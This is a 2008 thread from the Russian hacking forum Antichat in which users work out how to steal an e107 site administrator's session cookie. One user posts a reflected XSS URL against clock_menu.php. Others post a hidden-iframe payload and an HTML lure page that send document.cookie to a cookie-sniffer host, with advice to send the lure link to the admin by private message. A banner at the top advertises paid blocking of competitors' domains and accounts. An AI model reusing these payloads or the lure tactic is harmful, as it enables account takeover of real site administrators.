Куки админа

FORUMS

MEMBERS

RECENT POSTS

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
Куки админа

Опции темы

Поиск в этой теме

Опции просмотра

Куки админа

25.11.2008, 19:05

WiSp

Новичок

Регистрация: 25.06.2008

Сообщений: 5

С нами: 9409863

Репутация: 0

Куки админа

Тако сабж...

Есть уязвимость в движке е107

Код:

clock_menu/clock_menu.php?clock_flat=1&LAN_407=foo%22);//--%3E%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Собсна проблема в том, что не знаю как сделать так чтобы, это все подсунуть админу, и чтобы его куки выскочили не в окне, а сохранились где-то на моем хосте в лог файлах...в этом роде...

З.Ы если есть другие варианты подскажите пожалуйста... а то уже 2-ую неделю мучаюсь

Заранее спасибо

𝕏 Twitter Reddit Telegram Копировать ссылку

25.11.2008, 22:35

WiSp

Новичок

Регистрация: 25.06.2008

Сообщений: 5

С нами: 9409863

Репутация: 0

Эм....тут чуток разобрался...запустил снифер....Но снифер только на форум..на сайт никак...везде права на все урезаны...как мне через активную xSS можно сделать...Люди, помогите пожалуйста.

26.11.2008, 12:09

Тр⚡️ха

Reservists Of Antichat - Level 6

Регистрация: 14.11.2007

Сообщений: 178

С нами: 9731846

Репутация: 622

сделай страничку на каком нибудь фрихосте, на странице сделай нивидимый фрейм на хсс, админу в личку отправь месачь с сылкой на эту страницу

26.11.2008, 19:12

WiSp

Новичок

Регистрация: 25.06.2008

Сообщений: 5

С нами: 9409863

Репутация: 0

Собствеено делаю....

Вот

Цитата:

Но не работает( как ни старался... проверял на своем хосте...

26.11.2008, 20:21

WiSp

Новичок

Регистрация: 25.06.2008

Сообщений: 5

С нами: 9409863

Репутация: 0

А используя

Код:

document.write('<iframe width=1 height=1 style="position: absolute; visibility: hidden;" src="'+'http://xss.host.ru/xss.php'+'?['+location.host+']:'+document.cookie+'"></iframe>');

используя ява скрипт он должен открывать в принципе фрейм и сохранять куки вот здесь http://xss.host.ru/cookies

Но после всех проделанных действий ни куки ничего...

З.Ы. хост поддерживает и выполнение ява скриптов и пхп

26.11.2008, 21:19

furang

Познающий

Регистрация: 07.04.2007

Сообщений: 88

С нами: 10050808

Репутация: 48

у кукисов наверно ограниченная зона действия.
по дефолту у всех / стоит, но можно выбрать и другую диру

27.11.2008, 13:02

Тр⚡️ха

Reservists Of Antichat - Level 6

Регистрация: 14.11.2007

Сообщений: 178

С нами: 9731846

Репутация: 622

попробуй так

Код HTML:

<html>
тут какой нибуть флуд для админа

<iframe width=21 height=11 style="position: absolute; visibility: hidden;" src="http://жертва/clock_menu/clock_menu.php?clock_flat=1&LAN_407=foo%22);//--><script>document.location='http://тутснифер/?'+document.cookie+;</script>"></iframe>
</html>

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Уязвимости в WR-Meeting 1.0	otmorozok428	Веб-уязвимости	8	21.05.2008 17:17
Если уже имеется доступ в админ панель форума PhpBB, как узнать реал пасс админа?	silveran	Уязвимости CMS / форумов	3	06.05.2005 18:54
Есть хеш админа форума phpBB.Можно ли заменитьть куки, чтобы получить права админа?	proff	Уязвимости CMS / форумов	14	06.05.2005 06:00

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход

Home

Help

Terms and Rules